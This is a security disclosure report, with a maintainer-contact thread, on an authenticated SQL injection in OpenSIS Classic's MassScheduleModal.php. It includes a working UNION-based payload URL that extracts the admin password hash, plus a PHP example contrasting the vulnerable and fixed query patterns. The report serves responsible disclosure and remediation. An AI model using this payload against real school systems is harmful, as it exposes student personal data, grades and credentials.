Authenticated SQL Injection in OpenSIS Classic v9.0 and earlier in os4ed/opensis-classic
Reported on
Nov 25th 2022
Description
SQL injection in OpenSIS Classic v9.0 and earlier allows remote authenticated attackers to execute SQL code via the id parameter in MassScheduleModal.php, leading to full database information disclosure.
Version
At the time of reporting, the most up-to-date version of the master branch was used for testing. The latest commit was: 381a1ad. The release package 8.0 includes this vulnerability.
Edit: Since first reporting this, a new release has been published: 9.0. However, the affected files and code did not change.
Proof of Concept
- 1: Authenticate as student (or any other account)
- 2: Visit the following URL
http://<HOST>/MassScheduleModal.php?table_name=course_periods&id='+UNION+SELECT+'','','',(SELECT+CONCAT('ADMIN+HASH:+',password)+from+login_authentication+where+id=1),'','','','','','','','','','','','','','','','','','','','','','','','','','',''--+-
If error output is activated, the password hash for the first created user will be shown in the error output. If error output is disabled, attackers could still leverage blind enumeration techniques to brute force database contents.
Impact
Remote authenticated attackers can enumerate all database contents (either via reflective SQL injection when error output is enabled or by blind time-based SQL injection if it's not, for example). The database contains encrypted passwords, PII and other sensitive information such as grades.
Occurrences
MassScheduleModal.php L58: $_REQUEST[id] is passed to the SQL query without prior sanitization, making the query susceptible to SQL injection.
# POC
http://<HOST>/MassScheduleModal.php?table_name=courses&id='
MassScheduleModal.php L35: $_REQUEST[id] is passed to the SQL query without prior sanitization, making the query susceptible to SQL injection.
# POC
http://<HOST>/MassScheduleModal.php?table_name=course_periods&id='
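As an added illustration of the root cause described above (not code from OpenSIS Classic), the following shows the unsafe pattern of concatenating a request parameter into SQL next to a hardened version that allow-lists the table name and binds id; the function names, the allow-list contents and the mysqli connection are assumptions.

```php
<?php
// Illustrative example, not the project's own code. It contrasts the pattern
// the report describes (a raw request value inside the query text) with a
// fixed version. Function names, table allow-list and the $db handle are assumed.

// Vulnerable pattern (do not use): $_REQUEST['id'] becomes part of the SQL text,
// so a quote character in the parameter changes the statement structure.
function loadRowUnsafe(mysqli $db, string $table, string $id): ?array
{
    $sql = "SELECT * FROM {$table} WHERE id = '{$id}'";   // injectable
    $res = $db->query($sql);
    return $res ? ($res->fetch_assoc() ?: null) : null;
}

// Hardened version: table identifiers cannot be bound as parameters, so the
// table name is checked against a fixed allow-list; id is validated and bound.
const ALLOWED_TABLES = ['courses', 'course_periods'];   // assumed set

function loadRowSafe(mysqli $db, string $table, string $id): ?array
{
    if (!in_array($table, ALLOWED_TABLES, true)) {
        throw new InvalidArgumentException('table_name not allowed');
    }
    if (!ctype_digit($id)) {   // reject anything that is not a plain integer
        throw new InvalidArgumentException('id must be numeric');
    }
    $idInt = (int) $id;
    $stmt = $db->prepare("SELECT * FROM `{$table}` WHERE id = ?");
    $stmt->bind_param('i', $idInt);   // bound value, never part of the SQL text
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Usage with the request parameters named in the report. Database errors
// should be logged server-side, not echoed, since the report notes that
// error output exposes query results.
// $row = loadRowSafe($db, $_REQUEST['table_name'] ?? '', $_REQUEST['id'] ?? '');
```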
@admin I'd also like to request a CVE for this. I verified that this vulnerability has not been covered by CVE-2021-40618, CVE-2021-40617 or CVE-2021-40309 and is neither listed on cvedetails.com nor in the current GitHub issues.
Hi crackcat! A CVE may be assigned once the maintainers determine this to be a valid vulnerability, fix it and take it public, not before. OpenSIS are pretty active, so if you could be patient, they'll be here any minute :)
@admin After direct communication attempts, a second vulnerability that I reported to their email has now been fixed and published with the new release: 9.0.
I tried to get a response for this report here as well, but I believe there was some sort of confusion. If possible, could you send a reminder for this report?
Can you ask them to check their dashboard or send them the link?
Hi @psmoros They cannot access the report as it's (obviously) still private, so they requested the details from me via email.
If you could please resend a magic link to their mail address: info@os4ed.com, that'd be great. Also, please add a note that this invite is in response to exactly that request made by them towards pm_security_report@proton (crackcat), if possible, to avoid any confusion.
Using a subject of "RE: Vulnerability Disclosure" might help this matter too.
@admin (in case the above mention didn't go through) On a side note, I really support the suggestion of adding emoji responses ("Ok", "thumbs up/down", for example, to indicate that a message was read or acknowledged).
Hey crackcat, a magic link has now been sent to the email address provided!
As for your emoji-reaction feature request, it is something we are looking to add in the future.
Happy hunting :)